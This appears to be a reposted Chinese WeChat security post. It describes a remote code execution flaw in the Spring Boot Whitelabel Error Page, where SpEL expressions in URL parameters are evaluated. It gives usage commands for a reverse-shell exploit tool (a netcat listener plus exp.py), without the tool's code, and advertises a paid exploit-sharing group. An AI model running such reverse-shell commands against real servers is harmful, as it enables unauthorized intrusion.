Spring Boot whitelabel error page远程命令执行漏洞 POC

admin 2024年5月29日10:46:46评论31 views字数 979阅读3分15秒阅读模式

点击上方「蓝字」,关注我们

因为公众号现在只对常读和星标的公众号才能展示大图推送,建议大家进行星标。操作方法:点击右上角的【...】,然后点击【设为星标】即可。

Spring Boot whitelabel error page远程命令执行漏洞 POC

01

免责声明

免责声明该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。
02

文章正文

漏洞介绍

1、spring boot处理参数值出现错误,流程进入org.springframework.util.PropertyPlaceholderHelper

  1. 1. 此时会使用parseStringValue方法递归解析URL中的参数值。

3、“${}”包围的内容会被“org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfiguration”类的“resolvePlaceholder”方法解析为SpEL表达式执行,导致RCE漏洞。

EXP介绍

通过这个EXP可以判断是否存在漏洞并反弹shell。

首先比如访问/article?id=xxx时,页面会报错,状态码为500Whitelabel Error Page,可以使用当前的POC & EXP来尝试

使用方法

nc -lvvp 8088
python3 exp.py -lhost 127.0.0.1 -lport 8088 -t "http://127.0.0.1:9091/article?id="

-lhost:监听主机
-lport:监听端口
-t:目标URL(注意:需要包含主机、端口、路径、参数和"="。

Spring Boot whitelabel error page远程命令执行漏洞 POC
Spring Boot whitelabel error page远程命令执行漏洞 POC

回复关键字【20240604】领取工具

03

知识星球

【圈子简介】

高质量漏洞利用工具、最新漏洞POC/EXP分享社区,日常更新一个0Day/Nday/1day及对应漏洞的批量利用工具,内部POC分享,星球不定时更新内外网攻防渗透技巧等。分享行业最新资讯,交流解答各类技术问题。

【圈子服务】
  1. Fofa永久高级会员,助力挖洞
  2. 常态化更新最新的漏洞POC/EXP
  3. 常态化更新未公开、半公开漏洞POC
  4. 常态化更新优质外网打点、内网渗透工具
  5. 常态化更新安全资讯
  6. 开放交流环境,解决成员问题

Spring Boot whitelabel error page远程命令执行漏洞 POC

点个「在看」,你最好看

原文始发于微信公众号(安全之眼SecEye):Spring Boot whitelabel error page远程命令执行漏洞 POC

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月29日10:46:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Spring Boot whitelabel error page远程命令执行漏洞 POChttps://cn-sec.com/archives/2789907.html

发表评论

匿名网友 填写信息